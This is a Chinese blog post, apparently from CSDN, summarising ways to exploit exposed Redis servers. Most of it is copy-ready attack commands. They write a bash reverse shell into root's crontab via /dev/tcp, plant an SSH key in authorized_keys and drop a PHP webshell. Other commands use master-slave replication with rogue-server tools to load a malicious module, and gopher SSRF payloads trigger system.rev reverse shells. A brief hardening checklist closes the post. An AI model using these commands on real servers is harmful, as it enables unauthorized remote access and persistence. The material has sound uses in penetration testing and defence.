redis利用总结

  1. 利用计划任务反弹shell   

https://blog.csdn.net/yyj1781572/article/details/128082869https://blog.csdn.net/yyj1781572/article/details/128082869

centos成功 ubuntu失败 

set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.0.113/9999 0>&1\n" 

config set dir /var/spool/cron/ 设置导出目录 

config set dbfilename root 

save 

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/

redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save   

2.redis 密钥登录ssh 

生成密钥公钥  

ssh-keygen -t rsa  

防止乱码 导出key    

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt  

导入内容

cat key.txt | redis-cli -h 192.168.0.108 --pass pass123 -x set xxx  

--pass是登录密码 无密码可不填    

设置路径

config set dir /root/.ssh

设置文件名  

config set dbfilename authorized_keys 

保存 

save 

ssh 登录 

ssh -i id_rsa root@192.168.0.108 

 3.redis 写webshell 

192.168.0.108:6379> config set dir /var/www/html/        

192.168.0.108:6379> config set dbfilename shell.php         

192.168.0.108:6379> set x "<?php phpinfo();?>"            

192.168.0.108:6379> save     

 

4.利用主从复制RCE  

漏洞存在于4.x、5.x版本中,Redis提供了主从模式,主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件,即可执行命令。

受害人 就是从机  so文件      

攻击者就是主机 so文件     

工具下载

https://github.com/n0b0dyCN/redis-rogue-server

https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

python3 redis-rogue-server.py --rhost 192.168.0.109 --lhost 192.168.0.145

反弹shell

监听端口 nc -lvnp 9999

 如果遇上带密码的改一下脚本就可以了。

5.ssrf redis 反弹shell

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.0.119%252021000%250d%250aquit

导入模块

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520./exp.so%250d%250aquit

关闭主从

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aslaveof%2520NO%2520ONE%250d%250aquit

设置数据库名

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit

反弹shell

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250asystem.rev%2520192.168.0.119%25206666%250d%250aquit

6.本地redis主从复制RCE 反弹shell

kali 命令

nc -lvnp 2333    

python3 redis_rogue_server.py -v -path exp.so    

ubuntu上操作    

config set dir /tmp 

config set dbfilename exp.so

slaveof 192.168.0.119 21000

module load ./exp.so

slaveof NO ONE

system.rev 192.168.0.119 2333

 

7.redis安全设置

  1. 单独为redis设置一个普通账号 启动redis
  2. 设置本地 localhost 不允许外部访问
  3. 保护模式开启 protected-mode 开启 (默认开启)
  4. 把端口最好更改
  5. requirepass 设置redis密码    
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值